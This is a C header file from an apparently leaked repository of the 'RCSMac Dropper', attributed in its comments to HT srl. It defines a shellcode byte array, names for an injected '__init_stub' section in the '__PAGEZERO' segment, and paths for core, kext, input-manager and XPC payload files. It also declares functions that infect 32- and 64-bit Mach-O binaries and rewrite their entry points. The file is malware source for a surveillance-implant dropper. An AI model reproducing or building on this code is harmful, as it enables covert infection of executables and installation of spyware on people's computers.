RCSMacDropper/RCSMacInfector.h from hackedteam/vector-dropper

RCSMacDropper/RCSMacInfector.h
Summary

Maintainability

Test Coverage

Issues
/*
 * RCSMac Dropper
 *
 *
 * Created by Alfredo 'revenge' Pesoli on 20/07/2009
 * Win32 porting by Massimo Chiodini on 02/11/2009 
 * Copyright (C) HT srl 2009. All rights reserved
 *
 */
#ifdef WIN32
#pragma once
#include <Windows.h>
#endif

#include "RCSMacInfectorUtil.h"

#define INJECTED_SECTION_NAME "__init_stub"
#define INJECTED_SEGMENT_NAME "__PAGEZERO"

#define PAGE_ALIGNMENT  0x1000
#define MH_EXECUTE      0x2


int gNumberOfResources;

//
// Type of strings
//
#define STRING_SYMBOL   0x0001
#define STRING_DATA     0x0002

#define CPU_ARCH_ABI64  0x01000000    /* 64 bit ABI */
#define CPU_TYPE_X86    0x7
#define CPU_TYPE_X86_64 (CPU_TYPE_X86 | CPU_ARCH_ABI64)

unsigned char crtStart[] = "\x6a\x00\x89\xe5\x83\xe4\xf0\x83\xec"
                           "\x10\x8b\x5d\x04\x89\x5c\x24\x00\x8d"
                           "\x4d\x08\x89\x4c\x24\x04\x83\xc3\x01"
                           "\xc1\xe3\x02\x01\xcb\x89\x5c\x24\x08"
                           "\x8b\x03\x83\xc3\x04\x85\xc0\x75\xf7"
                           //"\x89\x5c\x24\x0c\xe8";
                           "\x89\x5c\x24\x0c\x60\xe8";

char *coreFilePath;
char *confFilePath;
char *kext32FilePath;
char *kext64FilePath;
char *inputManagerFilePath;
char *XPCFilePath;
char *iconFilePath;
char *bitmapFilePath;
char *installPath;
char *inputFilePath;
char *outputFilePath;

int gCoreFileSize;
int gConfFileSize;
int gKext32FileSize;
int gKext64FileSize;
int gInputManagerFileSize;
int gXPCFileSize;
int gIconFileSize;
int gInputFileSize;
int gBitmapFileSize;

int gFileType; // 0 = SingleArch, 1 = FAT, 2 = FAT (swap)
int gNumStrings;
struct fat_header gFatHeader;

uint32_t
getBinaryEP_32 (void *machoBase);

int
setBinaryEP_32 (void *machoBase, uint32_t anEntryPoint);

int infectSingleArch (char *inputFilePointer,
                      char *outputFilePointer,
                      int inOffsetToArch,
                      int outOffsetToArch,
                      int inputFileSize,
                      int outputFileSize);

int infectSingleArch64 (char *inputFilePointer,
                        char *outputFilePointer,
                        int inOffsetToArch,
                        int outOffsetToArch,
                        int inputFileSize,
                        int outputFileSize);

int
infectBinary (int aBinaryType,
              int fileSize,
              char *inputFilePointer,
              char *outputFilePointer,
              int outputFileSize,
              unsigned int *segmentVMAddr);

int
getBinaryFormat (char *aFilePointer);

void
usage (_mChar *aBinaryName);

int
parseArguments (int argc, char **argv);